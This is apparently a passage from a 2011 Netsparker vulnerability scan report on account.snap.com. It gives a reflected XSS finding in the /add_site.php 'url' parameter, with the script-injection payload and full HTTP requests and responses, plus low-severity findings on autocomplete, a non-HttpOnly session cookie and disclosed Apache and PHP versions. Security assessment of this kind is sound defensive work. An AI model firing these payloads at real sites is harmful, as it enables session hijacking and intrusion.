limited to Site demographics and contact and billing information. You agree that Snap may transfer and disclose to third parties personally identifiable information about You for the purpose of approving and enabling Your participation in the Program. Snap may also provide information in response to valid legal process, such as subpoenas, search warrants and court orders, or to establish or exercise its legal rights or defend against legal claims. Snap disclaims all responsibility, and will not be liable to You, however, for any disclosure of that information by any such third party. Snap may share non-personally-identifiable information about You, including Site URLs, Site-specific statistics and similar information collected by Snap, with advertisers, business partners, sponsors, and other third parties. In addition, if you sign up for Snap Shares Program, you will provide account information for your advertising service provider. Snap will use you account code to keep track of visitor traffic (click throughs) so You can get credit.13. Confidentiality. You will not disclose or use Snap's Confidential Information. "Confidential Information" means without limitation: (a) all Snap software, technology, programming, specifications, materials, guidelines and documentation relating to the Program; (b) operational metrics of your participation in the Program; and (c) any other information designated by Snap as "Confidential". Confidential Information does not include information that has become publicly known through no breach by You or Snap, or information that has been (i) independently developed without access to Snap Confidential Information, as evidenced in writing; (ii) rightfully received by You from a third party; or (iii) required to be disclosed by law or by a governmental authority. You acknowledge that Snap is under no obligation to mark any materials "Confidential" in order for you to treat such information as Confidential. 14. Miscellaneous. This Agreement shall be governed by the laws of California, except for its conflicts of laws principles. Any dispute or claim arising out of or in connection with this Agreement shall be adjudicated in Los Angeles, California. Following Termination, the following sections shall survive: 4, 10, 11, 12 and 13. This Agreement constitutes the entire agreement between the parties with respect to the subject matter hereof. If any provision herein is held unenforceable, then such provision will be modified to reflect the parties' intention, and the remaining provisions of this Agreement will remain in full force and effect. Continued use of or visits to the Site constitutes acceptance of any modified terms and conditions. You may not assign your rights or delegate your responsibilities hereunder without the express written permission of Snap. Snap may, at any time, assign its rights or delegate its obligations hereunder without notice to you. No person not a party to this Agreement is intended to be a beneficiary of this Agreement, and no person not a party to this Agreement shall have any right to enforce any term of this Agreement.</textarea>
<div>
<input name="accept_terms" value="1" type="checkbox"> <b>I agree to Terms & Conditions above.</b><span class="red">*</span>
</div>
<div>
<a href="javascript:window.open('/print_terms.php', 'print_terms', 'width=500,height=600,scrollbars=yes,resizeable,menubar=1'); void(0);">Print Terms & Conditions</a>
</div>
<div class="clear"></div>
</div>

<!--
<h2>Describe Your Site & Audience</h2>



<ul>
<li>Select the Primary Category of Your Site:<br />
<select class="text" name="shots_category1"> <option value=""></option> <option value="Arts & Entertainment">Arts & Entertainment</option> <option value="Automotive">Automotive</option> <option value="Business & Finance">Business & Finance</option> <option value="Computing & Technology">Computing & Technology</option> <option value="Education">Education</option> <option value="Employment">Employment</option> <option value="Games">Games</option> <option value="Health">Health</option> <option value="Lifestyle">Lifestyle</option> <option value="Online Shopping">Online Shopping</option> <option value="Personal">Personal</option> <option value="Politics & News">Politics & News</option> <option value="Real Estate">Real Estate</option> <option value="Relationships">Relationships</option> <option value="Religion">Religion</option> <option value="Sexually Explicit">Sexually Explicit</option> <option value="Sports">Sports<..
- /add_site.php

/add_site.php

https://account.snap.com/add_site.php

Parameters

Parameter Type Value
shots_age_range POST Under 13 years
shots_category1 POST 3
shots_category2 POST 3
shots_gender POST Primarily Male
shots_geography POST Africa
url POST '"--></style></script><script>alert(0x0004CC)</script>

Notes

This page responses with HTTP redirect status therefore detected XSS vulnerability might not be exploitable in many conditions however it still indicates lack of correct filtering and should be addressed.

Request

POST /add_site.php HTTP/1.1
Referer: https://account.snap.com/add_site.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: account.snap.com
Cookie: PHPSESSID=4329620185993f511f5aa3410492abe9
Content-Length: 207
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

shots_age_range=Under+13+years&shots_category1=3&shots_category2=3&shots_gender=Primarily+Male&shots_geography=Africa&url='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0004CC)%3c%2fscript%3e

Response

HTTP/1.0 302 Found
Date: Sat, 23 Jul 2011 22:39:37 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /login.php
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="content-type" content="text/html; charset=utf-8" /><title>Snap Account Signup</title><link rel="stylesheet" type="text/css" href="styles/account.css" /><script type="text/javascript" src="javascript/tab.js"></script><script type='text/javascript'>function toggle_section(num) { si = document.getElementById('section_'+num+'_img'); sd = document.getElementById('section_'+num+'_div'); sm = document.getElementById('section_'+num+'_more'); if (si.src.indexOf('/images/icon-more.gif') >= 0) { sd.style.display = 'inline'; sm.style.display = 'none'; si.src = '/images/icon-less.gif'; } else { sd.style.display = 'none'; sm.style.display = 'inline'; si.src = '/images/icon-more.gif'; }}</script></head><body><div id="shell">
<div id="topbar">
<div id="logo">
<a href="/"><img src="/images/topbar-logo.gif" alt="Snap Shots" title="Snap Shots" /></a>
</div>
<div id="toplinks">
Not logged in | <a href="/login.php">Log In</a> | <a href="http://snap.com/snapshots_faq.php">Help</a> </div>
</div>
<script>var currentTab = 'setup';</script><script type="text/javascript" src="/javascript/jquery.js"></script>

<div id="top-cap"></div>
<div id="wrapper">


<div class="clear"></div>
<div id="leftSide">
<ul id="tabs"><li><span class="tab-on">Site Info</span></li><li><span class="">Customization</span></li><li><span class="">Installation</span></li><li><span class="tab-off">Snap Shares&trade;</span></li> </ul>
<div id="statusInfo">
<h3>Add Shots to a New Site</h3> <p class="alert">No user found with that email</p> </div>

<form id="setup_form" name="setup_form" action="/add_site.php" method="post">


<div id="column2">
<div id="terms">
</div>

<!--
<h2>Describe Your Site & Audience</h2>



<ul>
<li>Select the Primary Category of Your Site:<br />
<select class="text" name="shots_category1"> <option value=""></option> <option value="Arts & Entertainment">Arts & Entertainment</option> <option value="Automotive">Automotive</option> <option value="Business & Finance">Business & Finance</option> <option value="Computing & Technology">Computing & Technology</option> <option value="Education">Education</option> <option value="Employment">Employment</option> <option value="Games">Games</option> <option value="Health">Health</option> <option value="Lifestyle">Lifestyle</option> <option value="Online Shopping">Online Shopping</option> <option value="Personal">Personal</option> <option value="Politics & News">Politics & News</option> <option value="Real Estate">Real Estate</option> <option value="Relationships">Relationships</option> <option value="Religion">Religion</option> <option value="Sexually Explicit">Sexually Explicit</option> <option value="Sports">Sports</option> <option value="Travel">Travel</option> </select> </li>

<li>If Applicable, Select a Secondary Category for Your Site:<br />
<select class="text" name="shots_category2"> <option value=""></option> <option value="Arts & Entertainment">Arts & Entertainment</option> <option value="Automotive">Automotive</option> <option value="Business & Finance">Business & Finance</option> <option value="Computing & Technology">Computing & Technology</option> <option value="Education">Education</option> <option value="Employment">Employment</option> <option value="Games">Games</option> <option value="Health">Health</option> <option value="Lifestyle">Lifestyle</option> <option value="Online Shopping">Online Shopping</option> <option value="Personal">Personal</option> <option value="Politics & News">Politics & News</option> <option value="Real Estate">Real Estate</option> <option value="Relationships">Relationships</option> <option value="Religion">Religion</option> <option value="Sexually Explicit">Sexually Explicit</option> <option value="Sports">Sports</option> <option value="Travel">Travel</option> </select> </li>

<li>Select the Gender that Best Describes Your Audience:<br />
<select class="text" name="shots_gender"> <option value=""></option> <option value="Primarily Male" selected>Primarily Male</option> <option value="Primarily Female">Primarily Female</option> <option value="No Preference">No Preference</option> </select> </li>

<li>Select the Age Range that Best Describes Your Audience:<br />
<select class="text" name="shots_age_range"> <option value=""></option> <option value="Under 13 years" selected>Under 13 years</option> <option value="13-17 years">13-17 years</option> <option value="18-24 years">18-24 years</option> <option value="25-34 years">25-34 years</option> <option value="35-44 years">35-44 years</option> <option value="45-54 years">45-54 years</option> <option value="55-64 years">55-64 years</option> <option value="65 or older">65 or older</option> </select> </li>

<li>Select the Geography that Best Describes Where Your Audience is From:<br />
<select class="text" name="shots_geography"> <option value=""></option> <option value="Africa" selected>Africa</option> <option value="Asia">Asia</option> <option value="Carribean">Carribean</option> <option value="Central America">Central America</option> <option value="Europe">Europe</option> <option value="Middle East">Middle East</option> <option value="North America">North America</option> <option value="Oceania">Oceania</option> <option value="South America">South America</option> </select> </li>
</ul>
-->
</div>

<div id="column1">

<h2>Enter Your Account Details</h2>
<ul>

<li>Your Website URL:<span class="red">*</span>&nbsp;&nbsp;<small>(e.g. www.domain.com)</small><br />
<input class="text" type="text" name="url" maxlength="255" value="'"--></style></script><script>netsparker(0x0004CC)</script>" /></li>

</ul>

<div class="clear"></div>
</div>

<div class="btn">
<img onclick="submitTabForm('setup_form');" src="/images/btn-continue.gif" width="181" height="31" />
</div>
</form>
</div>


<div id="rightSide">
<div id="web2links">
<a target="_blank" href="http://digg.com/tech_news/Snap_Shots" title="Digg this page"><img src="/images/icon-digg.gif" alt="Digg this Page" width="16" height="16"></a>
<a target="_blank" href="http://del.icio.us/post?url=http%3A%2F%2Fwww.snap.com%2Fsnapshots.php&amp;title=Snap%20Shots" title="Add to Delicious"><img src="/images/icon-delicious.gif" alt="Add to Delicious" width="16" height="16"></a>
<a target="_blank" href="mailto:?subject=Check out Snap Shots&body=Snap Shots is a great new web tool.%0A%0ACheck it out at: http://www.snap.com/snapshots.php%0A%0A(if the above link doesn't work, copy and paste the url into your browser address bar)." title="email a friend"><img src="/images/icon-emailafriend.gif" alt="email a friend" width="16" height="16"></a>
</div>

<div class="sidebar">
<h4>Testimonials</h4>
Snap Shots is an efficiency tool - it saves time for the reader, and that's a good thing for the publisher. I like it so much I put it on Techcrunch.<br /><br />
<small class="r">- Michael Arrington, <a href="http://www.techcrunch.com" target="_blank">Techcrunch</a></small>
<div class="clear"></div>
</div>
</div>
<div class="clear"></div>
</div>
<div id="bottom-cap"></div>
<div id="footer">
<div id="logo">
<a href="http://snap.com/"><img src="/images/footer-logo.gif" alt="Snap" title="Snap" /></a>
</div>
<div id="footlinks">
<a href="http://snap.com/about/about.php">About</a> | <a href="http://blog.snap.com/">Blog</a> | <a href="http://snap.com/about/feedbk.php">Feedback</a> | <a href="http://snap.com/about/downloads.php">Download</a> | <a href="http://snap.com/about/privacy.php">Privacy</a> | <a href="http://snap.com/about/terms.php">Terms</a>
</div>
</div>
<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script><script type="text/javascript">_udn = document.domain;_uacct = "UA-2209883-1";if (typeof currentTab == "string") { urchinTracker("/add_site.php#" + currentTab);} else { urchinTracker();}</script></div></body></html>
- /add_site.php

/add_site.php

https://account.snap.com/add_site.php

Parameters

Parameter Type Value
url POST '"--></style></script><script>alert(0x0004F8)</script>

Notes

This page responses with HTTP redirect status therefore detected XSS vulnerability might not be exploitable in many conditions however it still indicates lack of correct filtering and should be addressed.

Request

POST /add_site.php HTTP/1.1
Referer: https://account.snap.com/add_site.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: account.snap.com
Cookie: PHPSESSID=2b809de6f57474362ce3a3b367e55d23
Content-Length: 89
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

url='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0004F8)%3c%2fscript%3e

Response

HTTP/1.0 302 Found
Date: Sat, 23 Jul 2011 22:42:27 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /login.php
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="content-type" content="text/html; charset=utf-8" /><title>Snap Account Signup</title><link rel="stylesheet" type="text/css" href="styles/account.css" /><script type="text/javascript" src="javascript/tab.js"></script><script type='text/javascript'>function toggle_section(num) { si = document.getElementById('section_'+num+'_img'); sd = document.getElementById('section_'+num+'_div'); sm = document.getElementById('section_'+num+'_more'); if (si.src.indexOf('/images/icon-more.gif') >= 0) { sd.style.display = 'inline'; sm.style.display = 'none'; si.src = '/images/icon-less.gif'; } else { sd.style.display = 'none'; sm.style.display = 'inline'; si.src = '/images/icon-more.gif'; }}</script></head><body><div id="shell">
<div id="topbar">
<div id="logo">
<a href="/"><img src="/images/topbar-logo.gif" alt="Snap Shots" title="Snap Shots" /></a>
</div>
<div id="toplinks">
Not logged in | <a href="/login.php">Log In</a> | <a href="http://snap.com/snapshots_faq.php">Help</a> </div>
</div>
<script>var currentTab = 'setup';</script><script type="text/javascript" src="/javascript/jquery.js"></script>

<div id="top-cap"></div>
<div id="wrapper">


<div class="clear"></div>
<div id="leftSide">
<ul id="tabs"><li><span class="tab-on">Site Info</span></li><li><span class="">Customization</span></li><li><span class="">Installation</span></li><li><span class="tab-off">Snap Shares&trade;</span></li> </ul>
<div id="statusInfo">
<h3>Add Shots to a New Site</h3> <p class="alert">No user found with that email</p> </div>

<form id="setup_form" name="setup_form" action="/add_site.php" method="post">


<div id="column2">
<div id="terms">
</div>

<!--
<h2>Describe Your Site & Audience</h2>



<ul>
<li>Select the Primary Category of Your Site:<br />
<select class="text" name="shots_category1"> <option value=""></option> <option value="Arts & Entertainment">Arts & Entertainment</option> <option value="Automotive">Automotive</option> <option value="Business & Finance">Business & Finance</option> <option value="Computing & Technology">Computing & Technology</option> <option value="Education">Education</option> <option value="Employment">Employment</option> <option value="Games">Games</option> <option value="Health">Health</option> <option value="Lifestyle">Lifestyle</option> <option value="Online Shopping">Online Shopping</option> <option value="Personal">Personal</option> <option value="Politics & News">Politics & News</option> <option value="Real Estate">Real Estate</option> <option value="Relationships">Relationships</option> <option value="Religion">Religion</option> <option value="Sexually Explicit">Sexually Explicit</option> <option value="Sports">Sports</option> <option value="Travel">Travel</option> </select> </li>

<li>If Applicable, Select a Secondary Category for Your Site:<br />
<select class="text" name="shots_category2"> <option value=""></option> <option value="Arts & Entertainment">Arts & Entertainment</option> <option value="Automotive">Automotive</option> <option value="Business & Finance">Business & Finance</option> <option value="Computing & Technology">Computing & Technology</option> <option value="Education">Education</option> <option value="Employment">Employment</option> <option value="Games">Games</option> <option value="Health">Health</option> <option value="Lifestyle">Lifestyle</option> <option value="Online Shopping">Online Shopping</option> <option value="Personal">Personal</option> <option value="Politics & News">Politics & News</option> <option value="Real Estate">Real Estate</option> <option value="Relationships">Relationships</option> <option value="Religion">Religion</option> <option value="Sexually Explicit">Sexually Explicit</option> <option value="Sports">Sports</option> <option value="Travel">Travel</option> </select> </li>

<li>Select the Gender that Best Describes Your Audience:<br />
<select class="text" name="shots_gender"> <option value="" selected></option> <option value="Primarily Male">Primarily Male</option> <option value="Primarily Female">Primarily Female</option> <option value="No Preference">No Preference</option> </select> </li>

<li>Select the Age Range that Best Describes Your Audience:<br />
<select class="text" name="shots_age_range"> <option value="" selected></option> <option value="Under 13 years">Under 13 years</option> <option value="13-17 years">13-17 years</option> <option value="18-24 years">18-24 years</option> <option value="25-34 years">25-34 years</option> <option value="35-44 years">35-44 years</option> <option value="45-54 years">45-54 years</option> <option value="55-64 years">55-64 years</option> <option value="65 or older">65 or older</option> </select> </li>

<li>Select the Geography that Best Describes Where Your Audience is From:<br />
<select class="text" name="shots_geography"> <option value="" selected></option> <option value="Africa">Africa</option> <option value="Asia">Asia</option> <option value="Carribean">Carribean</option> <option value="Central America">Central America</option> <option value="Europe">Europe</option> <option value="Middle East">Middle East</option> <option value="North America">North America</option> <option value="Oceania">Oceania</option> <option value="South America">South America</option> </select> </li>
</ul>
-->
</div>

<div id="column1">

<h2>Enter Your Account Details</h2>
<ul>

<li>Your Website URL:<span class="red">*</span>&nbsp;&nbsp;<small>(e.g. www.domain.com)</small><br />
<input class="text" type="text" name="url" maxlength="255" value="'"--></style></script><script>netsparker(0x0004F8)</script>" /></li>

</ul>

<div class="clear"></div>
</div>

<div class="btn">
<img onclick="submitTabForm('setup_form');" src="/images/btn-continue.gif" width="181" height="31" />
</div>
</form>
</div>


<div id="rightSide">
<div id="web2links">
<a target="_blank" href="http://digg.com/tech_news/Snap_Shots" title="Digg this page"><img src="/images/icon-digg.gif" alt="Digg this Page" width="16" height="16"></a>
<a target="_blank" href="http://del.icio.us/post?url=http%3A%2F%2Fwww.snap.com%2Fsnapshots.php&amp;title=Snap%20Shots" title="Add to Delicious"><img src="/images/icon-delicious.gif" alt="Add to Delicious" width="16" height="16"></a>
<a target="_blank" href="mailto:?subject=Check out Snap Shots&body=Snap Shots is a great new web tool.%0A%0ACheck it out at: http://www.snap.com/snapshots.php%0A%0A(if the above link doesn't work, copy and paste the url into your browser address bar)." title="email a friend"><img src="/images/icon-emailafriend.gif" alt="email a friend" width="16" height="16"></a>
</div>

<div class="sidebar">
<h4>Testimonials</h4>
Snap Shots is an efficiency tool - it saves time for the reader, and that's a good thing for the publisher. I like it so much I put it on Techcrunch.<br /><br />
<small class="r">- Michael Arrington, <a href="http://www.techcrunch.com" target="_blank">Techcrunch</a></small>
<div class="clear"></div>
</div>
</div>
<div class="clear"></div>
</div>
<div id="bottom-cap"></div>
<div id="footer">
<div id="logo">
<a href="http://snap.com/"><img src="/images/footer-logo.gif" alt="Snap" title="Snap" /></a>
</div>
<div id="footlinks">
<a href="http://snap.com/about/about.php">About</a> | <a href="http://blog.snap.com/">Blog</a> | <a href="http://snap.com/about/feedbk.php">Feedback</a> | <a href="http://snap.com/about/downloads.php">Download</a> | <a href="http://snap.com/about/privacy.php">Privacy</a> | <a href="http://snap.com/about/terms.php">Terms</a>
</div>
</div>
<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script><script type="text/javascript">_udn = document.domain;_uacct = "UA-2209883-1";if (typeof currentTab == "string") { urchinTracker("/add_site.php#" + currentTab);} else { urchinTracker();}</script></div></body></html>
Auto Complete Enabled

Auto Complete Enabled

1 TOTAL
LOW
CONFIRMED
1
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".

Impact

Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.

Remedy

Add the attribute autocomplete="off" to the form tag or to individual "input" fields.

Actions to Take

  1. See the remedy for the solution.
  2. Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords, however, in most cases this is not recommended.
  3. Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.

Required Skills for Successful Exploitation

Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.

External References

- /login.php

/login.php CONFIRMED

https://account.snap.com/login.php

Identified Field Name

password

Request

GET /login.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: account.snap.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 23 Jul 2011 21:07:51 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Set-Cookie: PHPSESSID=3807e7a155fa600b1bf882a69d2f4cde; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Length: 3483
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="content-type" content="text/html; charset=utf-8" /><title>Snap Account Signup</title><link rel="stylesheet" type="text/css" href="styles/account.css" /><script type="text/javascript" src="javascript/tab.js"></script></head><body><div id="shell">
<div id="topbar">
<div id="logo">
<a href="/"><img src="/images/topbar-logo.gif" alt="Snap Shots" title="Snap Shots" /></a>
</div>
<div id="toplinks">
Not logged in | <a href="/login.php">Log In</a> | <a href="http://snap.com/snapshots_faq.php">Help</a> </div>
</div>
<div id="top-cap"></div><div id="wrapper"><div id="leftSide"><h1>Log in to your Snap Account</h1><div id="colCombine"> <form id="login" name="login" action="/login.php" method="post"> <p>If you don't have a Snap account, start by <a href="/signup.php">creating one</a>.</p> <ul id="enterInfo"> <li> <h2>Please Enter Your Email and Password</h2> </li> <li> <h5>Your Email:</h5> <input tabindex="1" type="text" id="enter" class="text" name="email" value=""> </li> <li> <h5>Your Password: <span><a tabindex="5" href="forgot_password.php">Forgot your password?</a></span></h5> <input tabindex="2" type="password" class="text" name="password" value=""> </li> <li id="remember"> <input tabindex="3" name="remember_me" value="1" type="checkbox"> Remember Me <small>(on this computer until you log out)</small> </li> <li class="btn"> <input tabindex="4" type="image" name="submit" src="/images/btn-login.gif" width="181" height="31" alt="Log In" title="Log In" /> </li> </form> <li class="dotted"> <p> <h5>Already have Snap Shots on your site but no account?</h5> <a tabindex="6" href="/importsettings.php">Click here</a> to create an account based on your current settings. </p> </li> </ul></div></div><div id="rightSide"><div class="sidebar"><h4>Recent Blog Posts</h4></div><div class="sidebar2"><h4>Special Offers</h4><a href="http://www.atomz.com/snap.html"><img src="images/atomz_ad.jpg" alt="Atomz - Free Site Search for Your Website" border="0" width="180" height="150" /></a></div></div><div class="clear"></div></div><div id="bottom-cap"></div><div id="footer">
<div id="logo">
<a href="http://snap.com/"><img src="/images/footer-logo.gif" alt="Snap" title="Snap" /></a>
</div>
<div id="footlinks">
<a href="http://snap.com/about/about.php">About</a> | <a href="http://blog.snap.com/">Blog</a> | <a href="http://snap.com/about/feedbk.php">Feedback</a> | <a href="http://snap.com/about/downloads.php">Download</a> | <a href="http://snap.com/about/privacy.php">Privacy</a> | <a href="http://snap.com/about/terms.php">Terms</a>
</div>
</div>
<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script><script type="text/javascript">_udn = document.domain;_uacct = "UA-2209883-1";if (typeof currentTab == "string") { urchinTracker("/login.php#" + currentTab);} else { urchinTracker();}</script><form id="login_form" method="POST" action="login.php"> <input type="hidden" name="tab" value="1"></form></div><script>document.getElementById("enter").focus();</script></body></html>
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /login.php

/login.php CONFIRMED

https://account.snap.com/login.php

Identified Cookie

PHPSESSID

Request

GET /login.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: account.snap.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 23 Jul 2011 21:07:51 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Set-Cookie: PHPSESSID=3807e7a155fa600b1bf882a69d2f4cde; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Length: 3483
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="content-type" content="text/html; charset=utf-8" /><title>Snap Account Signup</title><link rel="stylesheet" type="text/css" href="styles/account.css" /><script type="text/javascript" src="javascript/tab.js"></script></head><body><div id="shell">
<div id="topbar">
<div id="logo">
<a href="/"><img src="/images/topbar-logo.gif" alt="Snap Shots" title="Snap Shots" /></a>
</div>
<div id="toplinks">
Not logged in | <a href="/login.php">Log In</a> | <a href="http://snap.com/snapshots_faq.php">Help</a> </div>
</div>
<div id="top-cap"></div><div id="wrapper"><div id="leftSide"><h1>Log in to your Snap Account</h1><div id="colCombine"> <form id="login" name="login" action="/login.php" method="post"> <p>If you don't have a Snap account, start by <a href="/signup.php">creating one</a>.</p> <ul id="enterInfo"> <li> <h2>Please Enter Your Email and Password</h2> </li> <li> <h5>Your Email:</h5> <input tabindex="1" type="text" id="enter" class="text" name="email" value=""> </li> <li> <h5>Your Password: <span><a tabindex="5" href="forgot_password.php">Forgot your password?</a></span></h5> <input tabindex="2" type="password" class="text" name="password" value=""> </li> <li id="remember"> <input tabindex="3" name="remember_me" value="1" type="checkbox"> Remember Me <small>(on this computer until you log out)</small> </li> <li class="btn"> <input tabindex="4" type="image" name="submit" src="/images/btn-login.gif" width="181" height="31" alt="Log In" title="Log In" /> </li> </form> <li class="dotted"> <p> <h5>Already have Snap Shots on your site but no account?</h5> <a tabindex="6" href="/importsettings.php">Click here</a> to create an account based on your current settings. </p> </li> </ul></div></div><div id="rightSide"><div class="sidebar"><h4>Recent Blog Posts</h4></div><div class="sidebar2"><h4>Special Offers</h4><a href="http://www.atomz.com/snap.html"><img src="images/atomz_ad.jpg" alt="Atomz - Free Site Search for Your Website" border="0" width="180" height="150" /></a></div></div><div class="clear"></div></div><div id="bottom-cap"></div><div id="footer">
<div id="logo">
<a href="http://snap.com/"><img src="/images/footer-logo.gif" alt="Snap" title="Snap" /></a>
</div>
<div id="footlinks">
<a href="http://snap.com/about/about.php">About</a> | <a href="http://blog.snap.com/">Blog</a> | <a href="http://snap.com/about/feedbk.php">Feedback</a> | <a href="http://snap.com/about/downloads.php">Download</a> | <a href="http://snap.com/about/privacy.php">Privacy</a> | <a href="http://snap.com/about/terms.php">Terms</a>
</div>
</div>
<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script><script type="text/javascript">_udn = document.domain;_uacct = "UA-2209883-1";if (typeof currentTab == "string") { urchinTracker("/login.php#" + currentTab);} else { urchinTracker();}</script><form id="login_form" method="POST" action="login.php"> <input type="hidden" name="tab" value="1"></form></div><script>document.getElementById("enter").focus();</script></body></html>
Apache Version Disclosure

Apache Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is an Apache server. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can search for specific security vulnerabilities for the version of Apache identified within the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /javascript/

/javascript/

https://account.snap.com/javascript/

Extracted Version

2.2.14 (Unix)

Request

GET /javascript/ HTTP/1.1
Referer: https://account.snap.com/javascript/tab.js
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: account.snap.com
Cookie: PHPSESSID=5785bfecc05e8df1ec358b638a7b4947
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 403 Forbidden
Date: Sat, 23 Jul 2011 21:07:52 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
Content-Length: 213
Connection: close
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /javascript/on this server.</p></body></html>
PHP Version Disclosure

PHP Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing the PHP version in use through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.

Impact

An attacker can look for specific security vulnerabilities for the version identified. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.
- /javascript/

/javascript/

https://account.snap.com/javascript/

Extracted Version

PHP/5.2.8

Request

GET /javascript/ HTTP/1.1
Referer: https://account.snap.com/javascript/tab.js
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: account.snap.com
Cookie: PHPSESSID=5785bfecc05e8df1ec358b638a7b4947
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 403 Forbidden
Date: Sat, 23 Jul 2011 21:07:52 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
Content-Length: 213
Connection: close
Content-Type: text/html; charset=iso-8859-1


